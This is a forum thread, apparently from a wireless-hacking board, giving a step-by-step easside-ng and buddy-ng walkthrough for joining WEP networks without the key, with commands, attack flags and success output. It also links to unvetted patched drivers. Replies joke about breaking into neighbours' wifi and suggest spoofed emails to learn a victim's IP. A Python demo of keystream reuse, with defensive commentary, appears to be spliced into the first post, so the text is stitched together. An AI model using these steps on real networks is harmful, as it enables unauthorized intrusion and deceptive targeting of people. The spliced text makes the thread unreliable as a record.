Page 1 of 2
Results 1 to 10 of 13

Thread: Aircrack-ng new tools Using easside-ng on bt2

  1. #1
    drgr33n (Very good friend of the forum)
    Join Date: Jan 2010 | Location: Dark side of the moon ... | Posts: 699

    Aircrack-ng new tools Using easside-ng on bt2

    Hey guys

    Because I've now got my Atheros card writing PRGAs properly, I've been able to test these new tools. Here is a link to my patched drivers for Atheros cards; it is a dirty fix until the madwifi guys sort it, but it works fine for me and a few privileged friends that have the skill. Just download, make and make install.


    NEW DRIVERS v1.2 27-11-07

    http://www.mediafire.com/?5z1tl4tchmq

    easside-ng is described as a WEP magic wand tool for connecting to WEP encrypted wireless networks without a WEP key. It does this by sniffing packets from a legit user and uses these packets and the PRGA (pseudo random generation algorithm) xor data to encrypt new viable packets.

    easside-ng works in two stages. First, easside-ng has to establish basic connectivity between easside-ng, the buddy server and the access point. Once achieved, easside-ng will attempt to communicate with the WiFi network. If successful, you should be able to connect to the router and do just about anything.

    Aircrack-ng guys describe this tool as stable, but I wouldn't; it doesn't work all the time and it only works with open authentication systems.

    Another downside is easside-ng and wesside-ng are useless at guessing the ip addys at the mo, so for testing purposes you may benefit from telling easside-ng what ip addys to use. This is because easside-ng uses .1 as default for the last digit in the user's IP and .123 for the router's. Another point is easside-ng requires a valid client using the internet and not just static.

    Enough with the rambling; more info at http://aircrack-ng.org/doku.php?id=easside-ng. Now let's begin.

    First thing to do is setup a buddy server.

    Code:
    buddy-ng
    It should respond

    Code:
     buddy-ng
     Waiting for connexion
    Now check your buddy server is running: open up an internet browser and type in the address bar

    Code:
    http://127.0.0.1:6969
    Go back to the buddy window and you should now see

    Code:
     Waiting for connexion
     Got connection from 127.0.0.1
     That was it !
     Waiting for connexion
    If you see this, excellent, we are ready for easside-ng. This example is using the ip addys required. This is because I know the ip pool and subnet. Easside-ng can guess the ip pool and gateway, but as default it adds .123 to the end of the gateway and .1 to the ip address.

    Code:
    mkdir temp
    cd temp
    modprobe tun
    easside-ng -f ath1 -s 127.0.0.1 -r 192.168.1.254 -v 00:18:F6:79:1E:51 -i 192.168.1.64
    Let's break it down

    -s is the ip addy of the buddy server (you)
    -f is the adaptor I am using
    -r is the ip addy of the router
    -v is the mac addy of the router
    -i is the victim's ip addy

    Now if the hack was successful, you should see the following in the easside-ng shell

    Code:
    drgr33n crap # easside-ng -f ath1 -s 127.0.0.1 -r 192.168.1.254 -v 00:18:F6:79:1E:51 -i 192.168.1.64
    Setting tap MTU
    Sorting out wifi MAC
    MAC is 00:01:02:EC:8F:1A
    Setting tap MAC
    [14:15:45.929815] Ownin...
    Chan 07
    SSID Hack-me Chan 7 Mac 00:DE:ff:00:ff:00
    Sending auth request
    Authenticated
    Sending assoc request
    Associated: 1
    Unknown mgmt subtype 30
    Assuming ARP 36
    [14:16:11.424675] Got 22 bytes of PRGA IV [E3:67:7D]
    [14:16:11.430123] Got 58 bytes of PRGA IV [E5:67:7D]
    [14:16:11.539501] Got 166 bytes of PRGA IV [E8:67:7D]
    [14:16:11.660668] Got 490 bytes of PRGA IV [E9:67:7D]
    [14:16:11.784641] Got 1462 bytes of PRGA IV [EA:67:7D]
    [14:16:12.027078] Got 1504 bytes of PRGA IV [EC:67:7D]
    Sending who has 192.168.1.254 tell 192.168.1.64
    Rtr MAC 00:ff:00:ff:77:F0
    Trying to connect to buddy: 127.0.0.1:6969
    Connected
    Handshake compl33t
    Checking for internet... 1
    Checking for internet... 2
    Checking for internet... 3
    Internet w0rx.  Public IP 127.0.0.1
    Rtt 82ms
    Now bring your virtual network device up

    Code:
    ifconfig at0 up
    And you should be rockin

    Another cool thing is you can use easside's PRGA data with wesside: just navigate to the same temp folder and run wesside-ng to flood the network and grab the WEP key. The Aircrack crew are calling this "besside-ng" lol

    Enjoy
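The post above relies on one property of WEP that is worth seeing in code: whoever knows the plaintext of a captured frame learns the keystream for that IV, and that keystream encrypts any other frame of the same length under the same IV, all without the key. The script below is an added example and is not code from this thread or from the aircrack-ng project. It models a generic (key, IV) stream cipher; the keystream generator is a SHA-256 counter construction standing in for RC4 (an assumption made so it runs offline with the standard library), the key and IV are constructed, and the "known plaintext" is a constructed string rather than a real ARP frame. The property it demonstrates holds for any cipher whose keystream depends only on (key, IV); it is why a 24-bit IV space was never going to be enough, and why WPA2 moved to per-session keys with a packet counter that must never repeat.

```python
"""Keystream recovery and reuse under a repeated IV (added example).

Models a WEP-style stream cipher: frame = IV || (plaintext XOR keystream(key, IV)).
The keystream generator is a SHA-256 counter construction standing in for RC4
(assumption, so the script runs offline); the property shown does not depend
on which generator is used.
"""
import hashlib
import math
from itertools import count

IV_LEN = 3  # WEP carries a 24-bit IV in the clear in front of each frame body


def keystream(key: bytes, iv: bytes, length: int) -> bytes:
    """Stand-in PRGA: expand SHA-256(iv || key || counter) to `length` bytes."""
    out = bytearray()
    for ctr in count():
        out += hashlib.sha256(iv + key + ctr.to_bytes(4, "big")).digest()
        if len(out) >= length:
            break
    return bytes(out[:length])


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Legit station: IV in the clear, body XORed with the keystream (ICV omitted)."""
    return iv + xor(plaintext, keystream(key, iv, len(plaintext)))


def decrypt(key: bytes, frame: bytes) -> bytes:
    iv, body = frame[:IV_LEN], frame[IV_LEN:]
    return xor(body, keystream(key, iv, len(body)))


def recover_keystream(frame: bytes, known_plaintext: bytes) -> tuple[bytes, bytes]:
    """Observer who knows a frame's plaintext learns the keystream for its IV.

    This is the PRGA "xor data" the thread refers to; no key is learned.
    """
    iv, body = frame[:IV_LEN], frame[IV_LEN:]
    return iv, xor(body, known_plaintext[: len(body)])


def reencrypt_with_keystream(iv: bytes, ks: bytes, new_plaintext: bytes) -> bytes:
    """Any message up to len(ks) bytes can be encrypted under the same IV, keyless."""
    if len(new_plaintext) > len(ks):
        raise ValueError("recovered keystream shorter than message")
    return iv + xor(new_plaintext, ks[: len(new_plaintext)])


def expected_frames_until_iv_reuse(iv_bits: int = 24) -> float:
    """Birthday estimate: about sqrt(pi/2 * 2^bits) frames before two share an IV.

    For WEP's 24-bit IV this is only a few thousand frames, so keystream reuse
    is routine on a busy network even with honest stations.
    """
    return math.sqrt(math.pi / 2 * 2 ** iv_bits)


def demo() -> bytes:
    """Round trip: capture, recover keystream, re-encrypt a different message."""
    key = b"\x01\x23\x45\x67\x89"  # constructed 40-bit key
    iv = b"\xe3\x67\x7d"  # constructed, same shape as the IVs in the log above
    # Constructed known plaintext (a real ARP request has a fixed, guessable header).
    known = b"ARP who-has 192.168.1.254 tell 192.168.1.64"
    captured = encrypt(key, iv, known)
    iv_seen, ks = recover_keystream(captured, known)
    assert ks == keystream(key, iv, len(known))  # exact keystream, no key involved
    other = b"ARP who-has 192.168.1.254 tell 192.168.1.77"  # same length as `known`
    frame = reencrypt_with_keystream(iv_seen, ks, other)
    # The AP, holding the real key, decrypts it to exactly `other`.
    return decrypt(key, frame)


if __name__ == "__main__":
    print(demo())
    print(f"IV reuse expected after ~{expected_frames_until_iv_reuse():.0f} frames")
```

The defensive reading: the capture side of this needs nothing but a known plaintext and a passive sniffer, so there is no configuration of WEP that avoids it; the only mitigation is a cipher suite whose per-packet nonce cannot repeat and whose integrity check is keyed (WPA2/CCMP), plus monitoring for unexpected stations associating to the AP.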

  2. #2
    Junior Member
    Join Date: Oct 2007 | Posts: 26

    nice one

    but so weird that my alfa usb adapter can't do this :'(

    greetings

  3. #3
    Developer
    Join Date: Mar 2007 | Posts: 6,126

    I just don't see how this is useful at all. I would love for someone to explain how this can be used that other tools don't do much better. For one, how am I going to know the victim IP if I'm outside the LAN?

  4. #4
    Senior Member
    Join Date: Apr 2007 | Posts: 3,385

    Quote Originally Posted by purehate:
    I just don't see how this is useful at all. I would love for someone to explain how this can be used that other tools don't do much better. For one, how am I going to know the victim IP if I'm outside the LAN?

    E-mail receipt from victim?


    ***EDIT***

    -OR-

    If it's WEP encrypted, use Korek Chopchop method to get it.
    --=Xploitz=-- ®
    Remote-Exploit.org's Master Tutorialist.™
    VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial": http://forums.remote-exploit.org/showthread.php?t=9063
    VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial": http://forums.remote-exploit.org/showthread.php?t=7872
    VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial": http://forums.remote-exploit.org/showthread.php?t=8230
    VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases": http://forums.remote-exploit.org/showthread.php?t=8041

  5. #5
    imported_spankdidly (Senior Member)
    Join Date: Feb 2006 | Posts: 1,031

    Quote Originally Posted by -=Xploitz=-:
    E-mail receipt from victim?

    LOL!

    "Dear Dumb Hacker, You used your tool against my Wireless Lan, but it's not 192.168.1.1, it's 192.168.100.1, You noob, get it right the next time you hack into my wifi!"

    Love always, Your Neighbor.
    I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!

  6. #6
    Senior Member
    Join Date: Apr 2007 | Posts: 3,385

    Quote Originally Posted by spankdidly:
    LOL!

    "Dear Dumb Hacker, You used your tool against my Wireless Lan, but it's not 192.168.1.1, it's 192.168.100.1, You noob, get it right the next time you hack into my wifi!"

    Love always, Your Neighbor.

    LOL!!


    But on the serious side... did you see my edit?

    That's the only real way I can think of accomplishing this, unless you use Kismet, or open a capture in Wireshark maybe and search for the IP, or you actually do a spoofed email and request a delivery return receipt.

    BTW, I was kinda serious about the whole E-mail return receipt thing. If you send someone an Email, you can (with some Email clients) request a return receipt, much like our forum's PM system is set up, and get their IP that way. I just don't suggest using your real E-mail address if you're a wannabe blackhat, because you could get caught and you could get into trouble.

  7. #7
    drgr33n (Very good friend of the forum)
    Join Date: Jan 2010 | Location: Dark side of the moon ... | Posts: 699

    lol, it should guess the ip and gateway but it's rubbish; might be because of my dirty drivers. Now uploading v1.1 with support for many more cards.

  8. #8
    Developer
    Join Date: Mar 2007 | Posts: 6,126

    This is exactly my point. Why go through all this crap when WEP can be broken almost as fast as I can type the commands?

  9. #9
    drgr33n (Very good friend of the forum)
    Join Date: Jan 2010 | Location: Dark side of the moon ... | Posts: 699

    Because I'm doing a uni course and this is going to score me extra points. But yes, I see your point purehate; aircrack will crack 64-bit WEP with around 10000 IVs.

  10. #10
    imported_spankdidly (Senior Member)
    Join Date: Feb 2006 | Posts: 1,031

    Quote Originally Posted by purehate:
    This is exactly my point. Why go through all this crap when WEP can be broken almost as fast as I can type the commands?
    I think it was more of a "See, this is what else we can do with wep". Of course it's more of a hassle to do it that way. It doesn't make sense. But I'm sure somebody felt pretty cool when they figured it out. It is cool, but there's no need for it.

